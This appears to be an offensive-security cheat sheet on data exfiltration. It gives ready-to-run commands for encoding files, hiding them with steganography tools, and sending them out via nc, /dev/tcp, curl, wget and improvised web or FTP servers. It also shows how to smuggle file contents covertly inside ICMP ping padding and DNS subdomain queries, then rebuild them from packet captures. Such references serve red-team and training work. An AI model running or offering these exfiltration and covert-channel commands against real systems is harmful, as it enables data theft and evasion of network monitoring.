Exfiltration #
At a Glance #
Data exfiltration, also called data extrusion or data exportation, is the unauthorized transfer of data from a device or network.1
Encoding #
Base64 #
Linux encoding/decoding.
cat filename.ext | base64 -w0
cat filename.ext | base64 -d
Parameters
-w<col>: wrap encoded lines after<col>character (default 76).-d: decode data.
Windows encoding/decoding.
certutil -encode filename.ext output.ext
certutil -decode filename.ext output.ext
Steganography #
Cloakify 2 #
python ./cloakify.py filename.ext ./ciphers/topWebsites
Alternatively:
python ./cloakifyFactory
File Transfer #
wget (recursive) #
wget -r 10.0.0.3:1234
Parameters
-r: Specify recursive download.
curl #
curl 10.0.0.3/filename.ext -o filename.ext
Parameters
-o <file>: Write to<file>instead of stdout.
scp #
scp user@10.0.0.3:/filename.ext .
nc #
# Receiver
nc -nvlp 1234 > filename.ext
# Sender
nc -nv 10.0.0.1 1234 < filename.ext
Parameters
n: don’t do DNS lookups.v: prints status messages.l: listen.p <port>: local port used for listening.
/dev/tcp 3
#
# Receiver
nc -nvlp 1234 > filename.ext
# Sender
cat filename.ext > /dev/tcp/10.0.0.1/1234
# Sender
nc -w5 -nvlp 1234 < filename.ext
# Receiver
exec 6< /dev/tcp/10.0.0.1/1234
cat <&6 > filename.ext
Web Servers #
Python #
python -m SimpleHTTPServer 1234
python3 -m http.server 1234
Simple HTTP Server with File Upload
Ruby #
ruby -run -e httpd . -p1234
ruby -r webrick -e 'WEBrick::HTTPServer.new(:Port => 1234, :DocumentRoot => Dir.pwd).start'
Perl #
perl -MHTTP::Daemon -e '$d = HTTP::Daemon->new(LocalPort => 1234) or +die $!; while($c = $d->accept){while($r = $c->get_request){+$c->send_file_response(".".$r->url->path)}}'
Note:
Install HTTP:Daemon if not present with: sudo cpan HTTP::Daemon
PHP #
php -S 127.0.0.1:1234
NodeJS #
npm install -g http-server
http-server -p 1234
npm install -g node-static
static -p 1234
FTP Servers #
Python #
pip install pyftpdlib
python3 -m pyftpdlib -p 1234
NodeJS #
npm install -g ftp-srv
ftp-srv ftp://0.0.0.0:1234 --root ./
Tunneling #
ICMP #
Capture ICMP packets with the following script:
Generate ICMP packets from the file hexdump.
xxd -p -c 8 filename.ext | while read h; do ping -c 1 -p $h 10.0.0.3; done
Parameters
xxd:
-p: Output in postscript continuous hexdump style. Also known as plain hexdump style.-c <cols>: Format<cols>octets per line.
ping:
-c <count>: Stop after sending<count>ECHO_REQUESTpackets.-p: You may specify up to 16 “pad” bytes to fill out the packet you send.
Note:
Match xxd columns (-c 8) with the data sliced (packet[ICMP].load[-8:]) in the script.
DNS #
Capture DNS packets data.
sudo tcpdump -n -i wlan0 -w dns_exfil.pcap udp and src 10.0.0.3 and port 53
Note: Remember to point the DNS resolution to where packages are being captured.
Generate DNS queries.
xxd -p -c 16 filename.ext | while read h; do ping -c 1 ${h}.domain.com; done
Extract exfiltrated data.
tcpdump -r dns-exfil.pcap 2>/dev/null | sed -e 's/.*\ \([A-Za-z0-9+/]*\).domain.com.*/\1/' | uniq | paste -sd "" - | xxd -r -p
PacketWhisper 4 #
Capture packages with tcpdump,
as described above.
Cloak, exfiltrate and decloak from the cli.
sudo packetWhisper.py
Further Reading #
“Exfiltration, Tactic TA0010 - Enterprise.” MITRE ATT&CK®, https://attack.mitre.org/tactics/TA0010/. ↩︎
TryCatchHCF. “TryCatchHCF/Cloakify: CloakifyFactory.” GitHub, https://github.com/TryCatchHCF/Cloakify. ↩︎
“/Dev.” The Linux Documentation Project, https://tldp.org/LDP/abs/html/devref1.html. ↩︎
TryCatchHCF. “PacketWhisper.” GitHub, https://github.com/TryCatchHCF/PacketWhisper. ↩︎